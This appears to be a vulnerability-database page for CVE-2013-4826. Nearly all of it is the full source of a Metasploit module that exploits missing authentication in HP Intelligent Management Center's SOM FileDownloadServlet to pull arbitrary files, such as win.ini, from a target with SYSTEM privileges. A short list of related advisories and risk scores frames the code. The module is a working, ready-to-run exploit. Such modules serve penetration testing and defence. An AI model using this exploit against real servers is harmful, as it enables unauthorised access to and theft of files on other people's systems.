HP Intelligent Management SOM FileDownloadServlet Arbitrary Download

🗓️ 01 Sep 2024 00:00:00Reported by rgod, juan vazquez, metasploit.comType

packetstorm🔗 packetstormsecurity.com👁 169 Views

HP IMC SOM FileDownloadServlet Arbitrary Download, Lack of Authentication

Reporter	Title	Published	Views	Family All 13
Circl	CVE-2013-4826	29 May 201815:50	–	circl
Check Point Advisories	HP Intelligent Management Center SOM sdFileDownload Information Disclosure (CVE-2013-4826)	2 Dec 201300:00	–	checkpoint_advisories
CVE	CVE-2013-4826	13 Oct 201310:00	–	cve
Cvelist	CVE-2013-4826	13 Oct 201310:00	–	cvelist
Tenable Nessus	HP Intelligent Management Center SOM Module < 7.0 E0101 Multiple Vulnerabilities	9 Jan 201400:00	–	nessus
Tenable Nessus	HP Intelligent Management Center SOM Module Information Disclosure	9 Jan 201400:00	–	nessus
Metasploit	HP Intelligent Management SOM FileDownloadServlet Arbitrary Download	23 Oct 201316:24	–	metasploit
NVD	CVE-2013-4826	13 Oct 201310:20	–	nvd
Prion	Code injection	13 Oct 201310:20	–	prion
RedhatCVE	CVE-2013-4826	22 May 202502:38	–	redhatcve

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::Scanner  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'HP Intelligent Management SOM FileDownloadServlet Arbitrary Download',  
'Description' => %q{  
This module exploits a lack of authentication and access control in HP Intelligent  
Management, specifically in the FileDownloadServlet from the SOM component, in order to  
retrieve arbitrary files with SYSTEM privileges. This module has been tested successfully  
on HP Intelligent Management Center 5.2_E0401 with SOM 5.2 E0401 over Windows 2003 SP2.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'rgod <rgod[at]autistici.org>', # Vulnerability Discovery  
'juan vazquez' # Metasploit module  
],  
'References' =>  
[  
[ 'CVE', '2013-4826' ],  
[ 'OSVDB', '98251' ],  
[ 'BID', '62898' ],  
[ 'ZDI', '13-242' ]  
]  
))  
  
register_options(  
[  
Opt::RPORT(8080),  
OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']),  
OptString.new('FILEPATH', [true, 'The path of the file to download', 'c:\\windows\\win.ini'])  
])  
end  
  
def is_imc_som?  
res = send_request_cgi({  
'uri' => normalize_uri("servicedesk", "ServiceDesk.jsp"),  
'method' => 'GET'  
})  
  
if res and res.code == 200 and res.body =~ /servicedesk\/servicedesk/i  
return true  
else  
return false  
end  
end  
  
def my_basename(filename)  
return ::File.basename(filename.gsub(/\\/, "/"))  
end  
  
def run_host(ip)  
  
unless is_imc_som?  
vprint_error("HP iMC with the SOM component not found")  
return  
end  
  
vprint_status("Sending request...")  
res = send_request_cgi({  
'uri' => normalize_uri("servicedesk", "servicedesk", "fileDownload"),  
'method' => 'GET',  
'vars_get' =>  
{  
'OperType' => '2',  
'fileName' => Rex::Text.encode_base64(my_basename(datastore['FILEPATH'])),  
'filePath' => Rex::Text.encode_base64(datastore['FILEPATH'])  
}  
})  
  
if res and res.code == 200 and res.headers['Content-Type'] and res.headers['Content-Type'] =~ /application\/doc/  
contents = res.body  
fname = my_basename(datastore['FILEPATH'])  
path = store_loot(  
'hp.imc.somfiledownloadservlet',  
'application/octet-stream',  
ip,  
contents,  
fname  
)  
print_good("File saved in: #{path}")  
else  
vprint_error("Failed to retrieve file")  
return  
end  
end  
end  
`

01 Sep 2024 00:00Current

7.4High risk

Vulners AI Score7.4

CVSS 25

EPSS0.77228